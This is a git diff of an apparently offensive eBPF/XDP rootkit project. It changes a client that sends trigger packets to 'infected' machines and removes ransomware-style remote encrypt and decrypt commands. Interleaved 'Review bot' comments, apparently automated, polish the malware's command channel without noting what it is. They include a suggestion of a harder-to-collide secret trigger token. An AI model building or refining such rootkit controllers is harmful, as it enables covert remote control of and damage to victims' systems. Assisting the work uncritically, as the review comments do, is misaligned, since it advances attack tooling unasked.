diff --git a/src/.output/xdp_filter.bpf.o b/src/.output/xdp_filter.bpf.o
index e57c712..685b31d 100644
Binary files a/src/.output/xdp_filter.bpf.o and b/src/.output/xdp_filter.bpf.o differ
diff --git a/src/.output/xdp_filter.o b/src/.output/xdp_filter.o
index ad5af80..34d66c3 100644
Binary files a/src/.output/xdp_filter.o and b/src/.output/xdp_filter.o differ
diff --git a/src/.output/xdp_filter.skel.h b/src/.output/xdp_filter.skel.h
index 3e3a67c..94a762d 100644
--- a/src/.output/xdp_filter.skel.h
+++ b/src/.output/xdp_filter.skel.h
@@ -199,18 +199,18 @@ xdp_filter_bpf__create_skeleton(struct xdp_filter_bpf *obj) \x74\x2e\x31\0\x2e\x72\x6f\x64\x61\x74\x61\0\x6c\x69\x63\x65\x6e\x73\x65\0\x9f\ \xeb\x01\0\x20\0\0\0\0\0\0\0\x14\0\0\0\x14\0\0\0\x4c\x01\0\0\x60\x01\0\0\0\0\0\ \0\x08\0\0\0\x75\0\0\0\x01\0\0\0\0\0\0\0\x07\0\0\0\x10\0\0\0\x75\0\0\0\x14\0\0\ -\0\0\0\0\0\x7e\0\0\0\xaa\0\0\0\0\xc4\0\0\x08\0\0\0\x7e\0\0\0\xce\0\0\0\x05\xcc\ -\0\0\x30\0\0\0\x7e\0\0\0\xf1\0\0\0\x25\xd8\0\0\x38\0\0\0\x7e\0\0\0\x1b\x01\0\0\ -\x29\xd4\0\0\x40\0\0\0\x7e\0\0\0\x4d\x01\0\0\x15\x14\x01\0\x50\0\0\0\x7e\0\0\0\ -\x4d\x01\0\0\x09\x14\x01\0\x80\0\0\0\x7e\0\0\0\x7c\x01\0\0\x09\x30\x01\0\x98\0\ -\0\0\x7e\0\0\0\xa1\x01\0\0\x0e\x4c\x01\0\xa0\0\0\0\x7e\0\0\0\xa1\x01\0\0\x09\ -\x4c\x01\0\xb8\0\0\0\x7e\0\0\0\xc3\x01\0\0\x09\x64\x01\0\xd0\0\0\0\x7e\0\0\0\ -\xf7\x01\0\0\x0d\x90\x01\0\xd8\0\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x90\x01\0\xe0\0\ -\0\0\x7e\0\0\0\x23\x02\0\0\x01\xcc\x01\0\xe8\0\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\ -\x90\x01\0\xf0\0\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x90\x01\0\0\x01\0\0\x7e\0\0\0\ -\xf7\x01\0\0\x0d\x90\x01\0\x08\x01\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x90\x01\0\x10\ -\x01\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x90\x01\0\x18\x01\0\0\x7e\0\0\0\xf7\x01\0\0\ -\x0d\x90\x01\0\x20\x01\0\0\x7e\0\0\0\x25\x02\0\0\x05\x9c\x01\0\0\0\0\0\0\0\0\0\ +\0\0\0\0\0\x7e\0\0\0\xaa\0\0\0\0\xcc\0\0\x08\0\0\0\x7e\0\0\0\xce\0\0\0\x05\xd4\ +\0\0\x30\0\0\0\x7e\0\0\0\xf1\0\0\0\x25\xe0\0\0\x38\0\0\0\x7e\0\0\0\x1b\x01\0\0\ +\x29\xdc\0\0\x40\0\0\0\x7e\0\0\0\x4d\x01\0\0\x15\x1c\x01\0\x50\0\0\0\x7e\0\0\0\ +\x4d\x01\0\0\x09\x1c\x01\0\x80\0\0\0\x7e\0\0\0\x7c\x01\0\0\x09\x38\x01\0\x98\0\ +\0\0\x7e\0\0\0\xa1\x01\0\0\x0e\x54\x01\0\xa0\0\0\0\x7e\0\0\0\xa1\x01\0\0\x09\ +\x54\x01\0\xb8\0\0\0\x7e\0\0\0\xc3\x01\0\0\x09\x6c\x01\0\xd0\0\0\0\x7e\0\0\0\ +\xf7\x01\0\0\x0d\x98\x01\0\xd8\0\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x98\x01\0\xe0\0\ +\0\0\x7e\0\0\0\x23\x02\0\0\x01\xd4\x01\0\xe8\0\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\ 
+\x98\x01\0\xf0\0\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x98\x01\0\0\x01\0\0\x7e\0\0\0\ +\xf7\x01\0\0\x0d\x98\x01\0\x08\x01\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x98\x01\0\x10\ +\x01\0\0\x7e\0\0\0\xf7\x01\0\0\x0d\x98\x01\0\x18\x01\0\0\x7e\0\0\0\xf7\x01\0\0\ +\x0d\x98\x01\0\x20\x01\0\0\x7e\0\0\0\x25\x02\0\0\x05\xa4\x01\0\0\0\0\0\0\0\0\0\ \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xa4\0\0\0\0\0\x02\0\0\x01\0\0\0\0\ \0\0\0\0\0\0\0\0\0\0\x87\0\0\0\0\0\x02\0\xe8\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x80\ \0\0\0\0\0\x02\0\xe0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x14\0\0\0\x01\0\x04\0\0\0\0\ diff --git a/src/bin/xdp_filter b/src/bin/xdp_filter index e8dc90a..4d2d843 100755 Binary files a/src/bin/xdp_filter and b/src/bin/xdp_filter differ diff --git a/src/client/client.c b/src/client/client.c index db3bd77..0d262ad 100644 --- a/src/client/client.c +++ b/src/client/client.c @@ -9,6 +9,8 @@ #include #include +#include "../constants/constants.h" + // For printing with colors #define KGRN "\x1B[32m" #define KYLW "\x1B[33m" @@ -75,7 +77,7 @@ char* getLocalIpAddress(){ } -void get_shell(char* argv){ +/*void get_shell(char* argv){ char* local_ip = getLocalIpAddress(); printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv); check_ip_address_format(argv); @@ -114,13 +116,13 @@ void get_shell(char* argv){ } free(local_ip); -} +}*/ -void show_rootkit(char* argv){ +void send_secret_packet(char* argv){ char* local_ip = getLocalIpAddress(); printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv); check_ip_address_format(argv); - packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, "UMBRA_SHOW_ROOTKIT"); + packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, SECRET_PACKET_PAYLOAD); printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n"); //Sending the malicious payload if(rawsocket_send(packet)<0){ 
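Review bot: get_shell is retired by wrapping it in a block comment (`/*void get_shell(char* argv){`) instead of being removed, which leaves roughly forty lines of dead code whose closing `}*/` sits in the next hunk; if any line inside that span ever gains a `*/` the comment closes early and the build breaks. Delete the function outright — its history stays in git — and drop the matching `}*/` edit. getLocalIpAddress, whose closing brace opens this hunk, begins before the hunk.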
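Review bot: send_secret_packet reports a failed rawsocket_send only through printf and returns void, so main has no way to exit non-zero when the trigger packet never left the host; declare it `int send_secret_packet(char* argv)` and return `-1` from the error branch and `0` from the success branch (the caller in main can then propagate it). The payload it now builds is `SECRET_PACKET_PAYLOAD`, which constants.h in this same commit defines as the four-byte literal "test"; if the XDP side compares packet bytes against that string (the matching code is not in this diff), any traffic to port 9000 that happens to contain "test" would take the same path, so a longer, non-dictionary token should be chosen before this lands. The tail of the function (the success message and the free) lies in the following hunk.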
@@ -131,61 +133,6 @@ void show_rootkit(char* argv){ free(local_ip); } -void hide_rootkit(char* argv){ - char* local_ip = getLocalIpAddress(); - printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv); - check_ip_address_format(argv); - packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, "UMBRA_HIDE_ROOTKIT"); - printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n"); - //Sending the malicious payload - if(rawsocket_send(packet)<0){ - printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n"); - }else{ - printf("["KGRN"OK"RESET"]""Request to hide successfully sent!\n"); - } - free(local_ip); -} - -void encrypt_directory(char* argv, char* dir){ - char* local_ip = getLocalIpAddress(); - printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv); - printf("["KBLU"INFO"RESET"]""Target PATH selected: %s\n", dir); - char data_buffer[1024]; - strcpy(data_buffer, "UMBRA_ENCRYPT_DIR"); - strcat(data_buffer, dir); - check_ip_address_format(argv); - packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, data_buffer); - printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n"); - //Sending the malicious payload - if(rawsocket_send(packet)<0){ - printf("["KRED"ERROR"RESET"]""An error occured. 
Is the machine up?\n"); - }else{ - printf("["KGRN"OK"RESET"]""Request to encrypt directory successfully sent!\n"); - } - free(local_ip); -} - -void decrypt_directory(char* argv, char* dir){ - char* local_ip = getLocalIpAddress(); - printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv); - printf("["KBLU"INFO"RESET"]""Target PATH selected: %s\n", dir); - char data_buffer[1024]; - strcpy(data_buffer, "UMBRA_DECRYPT_DIR"); - strcat(data_buffer, dir); - check_ip_address_format(argv); - packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, data_buffer); - printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n"); - //Sending the malicious payload - if(rawsocket_send(packet)<0){ - printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n"); - }else{ - printf("["KGRN"OK"RESET"]""Request to decrypt directory successfully sent!\n"); - } - free(local_ip); -} - - - void main(int argc, char* argv[]){ if(argc<2){ @@ -214,7 +161,7 @@ void main(int argc, char* argv[]){ printf("["KBLU"INFO"RESET"]""Activated SEND a SECRET mode\n"); //printf("Option S has argument %s\n", optarg); strcpy(dest_address, optarg); - get_shell(dest_address); + send_secret_packet(dest_address); PARAM_MODULE_ACTIVATED = 1; break; 
@@ -272,20 +219,7 @@ void main(int argc, char* argv[]){ } } - //Checking activated mode, for those requiring multiple args - if(ENCRYPT_MODE_SEL == 1 && PATH_ARG_PROVIDED == 1){ - print_welcome_message(); - sleep(1); - //Selecting encrypt directory - Ransomware ON mode - printf("["KBLU"INFO"RESET"]""Selected ENCRYPT a rootkit remotely\n"); - encrypt_directory(dest_address, path_arg); - }else if(DECRYPT_MODE_SEL == 1 && PATH_ARG_PROVIDED == 1){ - print_welcome_message(); - sleep(1); - //Selecting encrypt directory - Ransomware ON mode - printf("["KBLU"INFO"RESET"]""Selected DECRYPT a rootkit remotely\n"); - decrypt_directory(dest_address, path_arg); - }else if(PARAM_MODULE_ACTIVATED==0){ + if(PARAM_MODULE_ACTIVATED==0){ printf("["KRED"ERROR"RESET"]""Invalid parameters\n"); print_help_dialog(argv[0]); exit(EXIT_FAILURE); diff --git a/src/client/client.o b/src/client/client.o index ef68732..fbabbf6 100644 Binary files a/src/client/client.o and b/src/client/client.o differ diff --git a/src/client/injector b/src/client/injector index 05c0512..456fb88 100755 Binary files a/src/client/injector and b/src/client/injector differ diff --git a/src/constants/constants.h b/src/constants/constants.h new file mode 100644 index 0000000..c75db68 --- /dev/null +++ b/src/constants/constants.h @@ -0,0 +1,6 @@ +#ifndef __CONSTANTS_H +#define __CONSTANTS_H + +#define SECRET_PACKET_PAYLOAD "test" + +#endif \ No newline at end of file diff --git a/src/ebpf/xdp_filter.bpf.c b/src/ebpf/xdp_filter.bpf.c index b25af0d..7b787e3 100644 --- a/src/ebpf/xdp_filter.bpf.c +++ b/src/ebpf/xdp_filter.bpf.c @@ -14,13 +14,15 @@ #include #include #include -#include "../user/xdp_filter.h" #include #include #include #include #include +#include "../user/xdp_filter.h" +#include "../constants/constants.h" + char LICENSE[] SEC("license") = "Dual BSD/GPL"; diff --git a/src/user/xdp_filter.c b/src/user/xdp_filter.c index 6a0aef6..5930a4d 100644 --- a/src/user/xdp_filter.c +++ b/src/user/xdp_filter.c 
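Review bot: `__CONSTANTS_H` is a reserved identifier — any name starting with two underscores belongs to the implementation — and the new file ends without a trailing newline; use `#ifndef CONSTANTS_H` / `#define CONSTANTS_H` and terminate the file with a newline. Because this header is now pulled into the userspace client, the loader in xdp_filter.c and the kernel-side xdp_filter.bpf.c, the trigger string is baked into every build artifact, so a placeholder value deserves a comment saying so: `/* Trigger string the client embeds in the packet; must match what the XDP program compares against. Placeholder value — replace before any deployment. */` above the define.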
@@ -5,50 +5,32 @@ #include #include #include +#include +#include + #include "xdp_filter.skel.h" #include "xdp_filter.h" -#include +#include "../constants/constants.h" static struct env { bool verbose; } env; -const char *argp_program_version = "xdp_filter 0.1"; -const char *argp_program_bug_address = ""; -const char argp_program_doc[] = -"My first eBPF packet filter using Express Data Path (XDP)\n" -"\n" -"TODO DESCRIPTION\n" -"\n" -"USAGE: ./xdp_filter [-v]\n"; +void print_help_dialog(const char* arg){ + printf("\nUsage: %s ./xdp_filter OPTION\n\n", arg); + printf("Program OPTIONs\n"); + char* line = "-t[NETWORK INTERFACE]"; + char* desc = "Activate XDP filter"; + printf("\t%-40s %-50s\n\n", line, desc); + line = "-v"; + desc = "Verbose mode"; + printf("\t%-40s %-50s\n\n", line, desc); + line = "-h"; + desc = "Print this help"; + printf("\t%-40s %-50s\n\n", line, desc); -/*Options for argp*/ -static const struct argp_option opts[] = { - { "verbose", 'v', NULL, 0, "Verbose debug output" }, - {}, -}; - -/*Command argument parsing, similar to getopt*/ -static error_t parse_arg(int key, char *arg, struct argp_state *state){ - switch (key) { - case 'v': - env.verbose = true; - break; - case ARGP_KEY_ARG: - argp_usage(state); - break; - default: - return ARGP_ERR_UNKNOWN; - } - return 0; } -static const struct argp argp = { - .options = opts, - .parser = parse_arg, - .doc = argp_program_doc, -}; - /*Wrapper for printing into stderr when debug active*/ static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args){ if (level == LIBBPF_DEBUG && !env.verbose) 
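Review bot: The usage line in print_help_dialog prints the program name twice — `%s` is filled from argv[0] and the literal `./xdp_filter` follows it — and it does not mark `-t` as required even though nothing else in the new argument handling selects an interface. Replace it with `printf("\nUsage: %s -t <NETWORK INTERFACE> [-v] [-h]\n\n", arg);` and word the `-t` row as "Network interface to attach the XDP filter to (required)". The function is only referenced from this translation unit as far as the diff shows, so `static void print_help_dialog(const char *arg)` would keep it out of the global namespace and let `-Wunused` catch a stale copy.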
@@ -100,79 +82,93 @@ int main(int argc, char**argv){ struct xdp_filter_bpf *skel; int err; - unsigned int ifindex = if_nametoindex(argv[1]); + unsigned int ifindex; /* Parse command line arguments */ - /*err = argp_parse(&argp, argc, argv, 0, NULL, NULL); - if (err) - return err;*/ + int opt; + while ((opt = getopt(argc, argv, ":t:vh")) != -1) { + switch (opt) { + case 't': + ifindex = if_nametoindex(optarg); + printf("Activating filter on network interface: %s\n", optarg); + if(ifindex == 0){ + perror("Error on input interface"); + exit(EXIT_FAILURE); + } + break; + case 'v': + //Verbose output + env.verbose = true; + break; - /* Set up libbpf errors and debug info callback */ + case 'h': + print_help_dialog(argv[0]); + exit(0); + break; + case '?': + printf("Unknown option: %c\n", optopt); + exit(EXIT_FAILURE); + break; + case ':': + printf("Missing arguments for %c\n", optopt); + exit(EXIT_FAILURE); + break; + + default: + print_help_dialog(argv[0]); + exit(EXIT_FAILURE); + } + } + + // Set up libbpf errors and debug info callback libbpf_set_print(libbpf_print_fn); - /* Bump RLIMIT_MEMLOCK to create BPF maps */ + // Bump RLIMIT_MEMLOCK to be able to create BPF maps bump_memlock_rlimit(); - /* Cleaner handling of Ctrl-C */ + // Cleaner handling of Ctrl-C signal(SIGINT, sig_handler); signal(SIGTERM, sig_handler); - /* Load and verify BPF application */ + // Load and verify BPF application skel = xdp_filter_bpf__open(); if (!skel) { fprintf(stderr, "Failed to open and load BPF skeleton\n"); return 1; } - /* Load & verify BPF programs */ + // Load & verify BPF programs */ err = xdp_filter_bpf__load(skel); if (err) { fprintf(stderr, "Failed to load and verify BPF skeleton\n"); goto cleanup; } - /* Attach tracepoints */ - err = xdp_filter_bpf__attach(skel); + // Attach tracepoints + /*err = xdp_filter_bpf__attach(skel); if (err) { fprintf(stderr, "Failed to attach BPF skeleton\n"); goto cleanup; - } - - int flags = XDP_FLAGS_SKB_MODE; - int fd = 
bpf_program__fd(skel->progs.xdp_receive); - - err = bpf_set_link_xdp_fd(ifindex, fd, flags); - - /* Set up ring buffer polling */ - /*rb = ring_buffer__new(bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL); - if (!rb) { - err = -1; - fprintf(stderr, "Failed to create ring buffer\n"); - goto cleanup; }*/ - /* Process events */ - printf("%-8s %-5s %-16s %-7s %-7s %s\n", - "TIME", "EVENT", "COMM", "PID", "PPID", "FILENAME/EXIT CODE"); + //Attack BPF program to network interface + int flags = XDP_FLAGS_SKB_MODE; + int fd = bpf_program__fd(skel->progs.xdp_receive); + err = bpf_set_link_xdp_fd(ifindex, fd, flags); + + printf("Filter set and ready\n"); while (!exiting) { - //err = ring_buffer__poll(rb, 100 /* timeout, ms */); - /* Ctrl-C will cause -EINTR */ - if (err == -EINTR) { - err = 0; - break; - } - if (err < 0) { - printf("Error polling perf buffer: %d\n", err); - break; - } + /* trigger our BPF program */ + fprintf(stderr, "."); + sleep(1); } + //Received signal to stop, detach program from network interface fd = -1; err = bpf_set_link_xdp_fd(ifindex, fd, flags); + cleanup: - /* Clean up */ - //ring_buffer__free(rb); xdp_filter_bpf__destroy(skel); return err < 0 ? -err : 0;